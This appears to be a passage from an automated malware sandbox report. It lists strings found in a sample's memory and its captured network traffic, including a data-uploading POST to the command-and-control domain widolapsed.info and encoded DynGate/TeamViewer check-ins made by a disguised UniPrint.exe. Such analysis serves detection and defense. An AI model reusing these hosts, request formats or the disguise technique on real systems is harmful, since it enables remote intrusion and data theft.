Source: wogZe27GBB.exeString found in binary or memory: https://sectigo.com/CPS0
Source: svchost.exe, 00000010.00000003.796660082.00000217C6F8B000.00000004.00000001.sdmpString found in binary or memory: https://support.g5e.com/hc/en-us/categories/360002985040-Hidden-City-Hidden-Object-Adventure
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/
Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/8C631A8/ELBASE.dll.mui01
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/
Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/(c~
Source: UniPrint.exe, 00000005.00000003.855571733.00000000057D3000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/.i
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/8
Source: UniPrint.exe, 00000005.00000003.1015064081.0000000000B75000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/B
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/B8C631A8/ELBASE.dll.mui01
Source: UniPrint.exe, 00000005.00000002.1075859898.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/B8C631A8/TTP-Out)LMEMX
Source: UniPrint.exe, 00000005.00000003.1014994738.00000000057DB000.00000004.00000001.sdmpString found in binary or memory: https://widolapsed.info/apsed.info/qWave
Source: wogZe27GBB.exeString found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/develop
Source: svchost.exe, 00000010.00000003.803398605.00000217C6F5E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.804244092.00000217C6FC5000.00000004.00000001.sdmpString found in binary or memory: https://www.roblox.com/info/privacy
Source: UniPrint.exe, 00000005.00000002.1074572782.0000000002A4C000.00000004.00000001.sdmp, UniPrint.exe, 00000005.00000002.1073981229.0000000002740000.00000004.00000001.sdmpString found in binary or memory: https://www.teamviewer.com/buy-now/?utm_medium=masterads&utm_source=master-commercial-use&utm_campai
Source: wogZe27GBB.exe, 00000000.00000002.688503915.000000000284F000.00000004.00000001.sdmp, UniPrint.exe, 00000003.00000001.687090019.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000005.00000001.699664637.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000A.00000002.759386163.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000B.00000001.754523638.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000C.00000001.760092265.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 0000000E.00000001.771181337.0000000010000000.00000002.00020000.sdmp, nsrC1CA.tmp.0.drString found in binary or memory: https://www.teamviewer.com/licensing/order.aspx?lng=ja
Source: svchost.exe, 00000010.00000003.797707479.00000217C6FB0000.00000004.00000001.sdmp, svchost.exe, 00000010.00000003.797621613.00000217C6F5E000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
Source: UniPrint.exe, 00000005.00000002.1072984731.0000000000B00000.00000004.00000020.sdmpString found in binary or memory: https://www.verisign.c
Source: unknownHTTP traffic detected: POST /B8C631A8/ HTTP/1.1Content-Length: 85991Content-Type: multipart/form-data; boundary=--------988836371User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: widolapsed.infoConnection: CloseCache-Control: no-cache
Source: unknownDNS traffic detected: queries for: ping3.dyngate.com
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 3_2_6E5C5900 GetProcessHeap,GetProcessHeap,HeapAlloc,HttpQueryInfoW,InternetReadFile,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,RtlMoveMemory,InternetReadFile,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047145&p=10000001&client=DynGate&data=FyQSbQCjHqkys5MkoZ6YmBgcGRsZGpmckySiHpgTJqChnpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJqSiHpg8MrGzGjExHByxGZkbr5kcmpsaHBgbGRsTJ6meq7S3GZcYmJMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=42047145&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047152&p=10000001&client=DynGate&data=FyQS8QAjHqmyuig6sTY0saWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAAFIAACkpoJiAAgAACIAAAH7LQs0qhaWs0MJjaOW1RZp/s+y/yn5XEbeVZg9sKBJ5zPw4VSW4zdwQ3dPOJPU35FNkIfcILZEzewXzbzR9HNSPt0dvZIMvjxebsFa8mt4yIfhUHNJCrU/eCKZvCgbkPO7XECRgFWPWpqy/DxavH2VA1uMNeC6MgWi1tqYJlUpU HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=42047152&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=991669640&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047159&p=10000001&client=DynGate&data=FyQS9ACjHqmyuim0s7cwujq5MqWyvJMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMmpKIemDwysbMaMTEcHLEZmRuvmRyamxocGBsZGxMrHpialxgXGxwbkCipkyE0tzC5PJ6DAQAAABIAACkpoJiAAgAACIAAABKJHDw2LgVxSDgQRZJcruSvmCif9Gt2TW3hKr1gLfUfE+41DTTEIjH9R8iP3LoBGOJ+mtJU9XCLVeH0PEI9syAw5y9+liHYCQSiHVEX/VS+caNKAiNEKBpchOIJAAICwW843p+TOKZHDFo8qX87SA1CKgBTr4AFtosrqQ/gO/pU HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=42047159&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&client=DynGate&rnd=279943160&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /dout.aspx?s=42047224&p=10000001&client=DynGate&data=FyQS6wChtjSytzoeqisoqZMjHqY3s7S3EyOrnpgTI6umMrsyth6aGBgTJDSyMqe3NjS3Mqm6MLo6uZ6YEyQqKignqqoemRMkoZ6YmBgcGRsZGpmckySiHpmcmJgam5oanBMlsrK4MLY0uzKemJMmMLczurCzsp61MJMmNLGytzmyqjy4Mp6YEyakoh6YPDKxsxoxMRwcsRmZG6+ZHJqbGhwYGxkbEyc3p7Mgsbo0uzKlsrK4MLY0uzKemBMpOrc6NLaynpqTKbq4ODe5OjKyIzKwujq5MrmemJMqIagnqqoemBMrHpialxgXGxwbkCip HTTP/1.1Accept: */*Content-Type: application/octet-streamContent-Transfer-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=42047224&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: master13.teamviewer.comConnection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=00000000&m=fast&client=DynGate&rnd=975066281&p=10000001 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /din.aspx?s=12251267&m=fast&client=DynGate&p=10000002 HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)Host: 188.172.235.146Connection: Keep-AliveCache-Control: no-cache
Source: unknownHTTPS traffic detected: 45.153.241.148:443 -> 192.168.2.4:49767 version: TLS 1.2